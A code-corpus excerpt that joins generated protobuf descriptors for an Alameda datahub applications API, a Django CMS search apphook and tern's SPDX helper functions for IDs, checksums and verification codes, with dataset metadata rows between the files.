name='status', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse.status', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse.applications', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=706,
serialized_end=855,
)
_DELETEAPPLICATIONSREQUEST = _descriptor.Descriptor(
name='DeleteApplicationsRequest',
full_name='containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='schema_meta', full_name='containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest.schema_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest.applications', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=858,
serialized_end=1058,
)
_CREATEAPPLICATIONSREQUEST.fields_by_name['schema_meta'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2._SCHEMAMETA
_CREATEAPPLICATIONSREQUEST.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2._WRITEAPPLICATION
_LISTAPPLICATIONSREQUEST.fields_by_name['schema_meta'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2._SCHEMAMETA
_LISTAPPLICATIONSREQUEST.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2._READAPPLICATION
_LISTAPPLICATIONSRESPONSE.fields_by_name['status'].message_type = google_dot_rpc_dot_status__pb2._STATUS
_LISTAPPLICATIONSRESPONSE.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_types__pb2._APPLICATION
_DELETEAPPLICATIONSREQUEST.fields_by_name['schema_meta'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2._SCHEMAMETA
_DELETEAPPLICATIONSREQUEST.fields_by_name['applications'].message_type = alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2._DELETEAPPLICATION
DESCRIPTOR.message_types_by_name['CreateApplicationsRequest'] = _CREATEAPPLICATIONSREQUEST
DESCRIPTOR.message_types_by_name['ListApplicationsRequest'] = _LISTAPPLICATIONSREQUEST
DESCRIPTOR.message_types_by_name['ListApplicationsResponse'] = _LISTAPPLICATIONSRESPONSE
DESCRIPTOR.message_types_by_name['DeleteApplicationsRequest'] = _DELETEAPPLICATIONSREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CreateApplicationsRequest = _reflection.GeneratedProtocolMessageType('CreateApplicationsRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEAPPLICATIONSREQUEST,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest)
})
_sym_db.RegisterMessage(CreateApplicationsRequest)
ListApplicationsRequest = _reflection.GeneratedProtocolMessageType('ListApplicationsRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTAPPLICATIONSREQUEST,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest)
})
_sym_db.RegisterMessage(ListApplicationsRequest)
ListApplicationsResponse = _reflection.GeneratedProtocolMessageType('ListApplicationsResponse', (_message.Message,), {
'DESCRIPTOR' : _LISTAPPLICATIONSRESPONSE,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse)
})
_sym_db.RegisterMessage(ListApplicationsResponse)
DeleteApplicationsRequest = _reflection.GeneratedProtocolMessageType('DeleteApplicationsRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETEAPPLICATIONSREQUEST,
'__module__' : 'alameda_api.v1alpha1.datahub.applications.services_pb2'
# @@protoc_insertion_point(class_scope:containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationsRequest)
})
_sym_db.RegisterMessage(DeleteApplicationsRequest)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 50.930435 | 1,465 | 0.814837 | 1,326 | 11,714 | 6.837858 | 0.122172 | 0.066174 | 0.101246 | 0.089997 | 0.702879 | 0.655454 | 0.634168 | 0.605934 | 0.523657 | 0.521451 | 0 | 0.03634 | 0.083831 | 11,714 | 229 | 1,466 | 51.152838 | 0.808517 | 0.057453 | 0 | 0.609137 | 1 | 0.005076 | 0.309673 | 0.282658 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045685 | 0 | 0.045685 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e04e43c85e6c8808703e6cd3c202d5d56239837d | 452 | py | Python | js_search/cms_apps.py | compoundpartners/js-search | b6a32fc21971d17af593985bd936cd47b486457a | [
"BSD-3-Clause"
] | null | null | null | js_search/cms_apps.py | compoundpartners/js-search | b6a32fc21971d17af593985bd936cd47b486457a | [
"BSD-3-Clause"
] | null | null | null | js_search/cms_apps.py | compoundpartners/js-search | b6a32fc21971d17af593985bd936cd47b486457a | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from . import DEFAULT_APP_NAMESPACE
class SearchApp(CMSApp):
name = _('Search')
app_name = DEFAULT_APP_NAMESPACE
urls = ['js_search.urls']
def get_urls(self, *args, **kwargs):
return self.urls
apphook_pool.register(SearchApp)
# File: tern/formats/spdx/spdx_common.py (repo: KerinPithawala/tern, license: BSD-2-Clause)
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause

"""
Common functions that are useful for both JSON and Tag-value document creation
"""

import datetime
import hashlib
import logging
import re
import uuid

from tern.utils import constants
from tern.formats.spdx.spdxtagvalue import formats as spdx_formats

# global logger
logger = logging.getLogger(constants.logger_name)


###################
# General Helpers #
###################

def get_uuid():
    """Return a UUID string"""
    return str(uuid.uuid4())


def get_timestamp():
    """Return a timestamp"""
    return datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")


def get_string_id(string):
    """Return a unique identifier for the given string"""
    return hashlib.sha256(string.encode('utf-8')).hexdigest()[-7:]


def get_license_ref(license_string):
    """For SPDX tag-value format, return a LicenseRef string"""
    return 'LicenseRef-' + get_string_id(license_string)
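As a standalone illustration of the scheme above (assuming only `hashlib` and nothing tern-specific), the short id is the last 7 hex digits of a SHA-256 digest, prefixed with `LicenseRef-`:

```python
import hashlib


def short_id(s):
    # Last 7 hex digits of the SHA-256 of the string
    # (same scheme as get_string_id above).
    return hashlib.sha256(s.encode('utf-8')).hexdigest()[-7:]


def license_ref(license_string):
    # Prefix the short id to build an SPDX LicenseRef, as in get_license_ref.
    return 'LicenseRef-' + short_id(license_string)


ref = license_ref('GPL-2.0 WITH Linux-syscall-note')
print(len(ref))  # 18: 'LicenseRef-' (11 chars) plus 7 hex digits
```

The id is deterministic, so the same license string always maps to the same LicenseRef across documents.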
########################
# Common Image Helpers #
########################

def get_image_spdxref(image_obj):
    '''Given the image object, return an SPDX reference ID'''
    # here we return the image name, tag and id
    return 'SPDXRef-{}'.format(image_obj.get_human_readable_id())


########################
# Common Layer Helpers #
########################

def get_file_licenses(filedata):
    '''Return a unique list of file licenses'''
    return list(set(filedata.licenses))


def get_layer_licenses(layer_obj):
    '''Return a list of unique licenses from the files analyzed
    in the layer object. It is assumed that the files were analyzed and
    there should be some license expressions. If there are not, an empty
    list is returned'''
    licenses = set()
    for filedata in layer_obj.files:
        # we will use the SPDX license expressions here as they will be
        # valid SPDX license identifiers
        if filedata.licenses:
            for lic in get_file_licenses(filedata):
                licenses.add(lic)
    return list(licenses)
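A minimal sketch of the same de-duplication, using hypothetical `(path, licenses)` tuples as stand-ins for the FileData objects tern uses internally:

```python
def layer_licenses(files):
    # Union of license ids across all files in a layer, mirroring
    # get_layer_licenses above; each entry is a (path, licenses) stand-in.
    licenses = set()
    for _path, lics in files:
        licenses.update(lics)
    return sorted(licenses)


print(layer_licenses([('a.c', ['MIT']), ('b.c', ['MIT', 'BSD-2-Clause'])]))
# ['BSD-2-Clause', 'MIT']
```

Sorting here is only for a stable demo output; the real helper returns an unordered `list(set(...))`.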
def get_layer_spdxref(layer_obj):
    '''Given the layer object, return an SPDX reference ID'''
    # here we return the shortened diff_id of the layer
    return 'SPDXRef-{}'.format(layer_obj.diff_id[:10])


def get_layer_spdxref_snapshot(timestamp):
    """Given the layer object created at container build time, return an
    SPDX reference ID. For this case, a layer's diff_id and filesystem hash
    are not known, so we provide a generic ID"""
    return 'SPDXRef-snapshot-{}'.format(timestamp)


def get_layer_verification_code(layer_obj):
    '''Calculate the verification code from the files in an image layer. This
    assumes that layer_obj.files_analyzed is True. The implementation follows
    the algorithm in the SPDX spec v2.1, which requires SHA1 to be used to
    calculate the checksums of each file and the final verification code'''
    sha1_list = []
    for filedata in layer_obj.files:
        filesha = filedata.get_checksum('sha1')
        if not filesha:
            # we cannot create a verification code, hence file generation
            # is aborted
            logger.critical(
                'File %s does not have a sha1 checksum. Failed to generate '
                'an SPDX tag-value report', filedata.path)
            return None
        sha1_list.append(filesha)
    sha1_list.sort()
    sha1s = ''.join(sha1_list)
    return hashlib.sha1(sha1s.encode('utf-8')).hexdigest()  # nosec
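The sort step above is what makes the verification code independent of file ordering. A self-contained sketch of the core algorithm (sort the per-file SHA1 hex digests, concatenate, SHA1 the result), with synthetic checksums standing in for real file hashes:

```python
import hashlib


def verification_code(sha1_checksums):
    # SPDX 2.1 verification code: sort the per-file SHA1 hex digests,
    # concatenate them, and take the SHA1 of the result.
    joined = ''.join(sorted(sha1_checksums))
    return hashlib.sha1(joined.encode('utf-8')).hexdigest()  # nosec


a = hashlib.sha1(b'file-a').hexdigest()
b = hashlib.sha1(b'file-b').hexdigest()
# The sort makes the code independent of the order files were walked in:
print(verification_code([a, b]) == verification_code([b, a]))  # True
```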
def get_layer_checksum(layer_obj):
    '''Return an SPDX formatted checksum value. It should be of the form:
    <checksum_type>: <checksum>'''
    return '{}: {}'.format(layer_obj.checksum_type.upper(), layer_obj.checksum)


##########################
# Common Package Helpers #
##########################

def get_package_spdxref(package_obj):
    '''Given the package object, return an SPDX reference ID'''
    pkg_ref = spdx_formats.package_id.format(name=package_obj.name,
                                             ver=package_obj.version)
    # replace the characters that SPDX doesn't allow in identifiers
    clean_pkg_ref = re.sub(r'[:+~]', r'-', pkg_ref)
    return 'SPDXRef-{}'.format(clean_pkg_ref)


#######################
# Common File Helpers #
#######################

def get_file_spdxref(filedata, layer_id):
    '''Given a FileData object, return a unique identifier for the SPDX
    document. According to the spec, this should be of the form: SPDXRef-<id>
    We use a combination of the file name, checksum and layer_id and
    calculate a hash of this string'''
    file_string = filedata.path + filedata.checksum[:7] + layer_id
    fileid = get_string_id(file_string)
    return 'SPDXRef-{}'.format(fileid)
def get_file_checksum(filedata):
    '''Given a FileData object, return the checksum required by SPDX.
    This should be of the form: <checksum_type>: <checksum>
    Currently, the spec requires a SHA1 checksum'''
    return '{}: {}'.format('SHA1', filedata.get_checksum('sha1'))


def get_file_notice(filedata):
    '''Return a formatted string with all copyrights found in a file. Return
    an empty string if there are no copyrights'''
    notice = ''
    for cp in filedata.copyrights:
        notice = notice + cp + '\n'
    return notice


def get_file_comment(filedata):
    '''Return a formatted comment string with all file level notices. Return
    an empty string if no notices are present'''
    comment = ''
    for origin in filedata.origins.origins:
        comment = comment + '{}:'.format(origin.origin_str) + '\n'
        for notice in origin.notices:
            comment = comment + \
                '{}: {}'.format(notice.level, notice.message) + '\n'
    return comment
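The comment builder above walks a nested origin/notice structure. A sketch of the same traversal over namedtuple stand-ins (the real `Origin` and `Notice` types live in tern's internals, so these are assumptions for illustration only):

```python
from collections import namedtuple

# Hypothetical stand-ins for tern's origin/notice objects.
Notice = namedtuple('Notice', ['level', 'message'])
Origin = namedtuple('Origin', ['origin_str', 'notices'])


def file_comment(origins):
    # Mirror of get_file_comment above: one header line per origin,
    # then one "level: message" line per notice under it.
    comment = ''
    for origin in origins:
        comment += '{}:\n'.format(origin.origin_str)
        for notice in origin.notices:
            comment += '{}: {}\n'.format(notice.level, notice.message)
    return comment


demo = [Origin('scancode', [Notice('info', 'license found')])]
print(file_comment(demo))
# scancode:
# info: license found
```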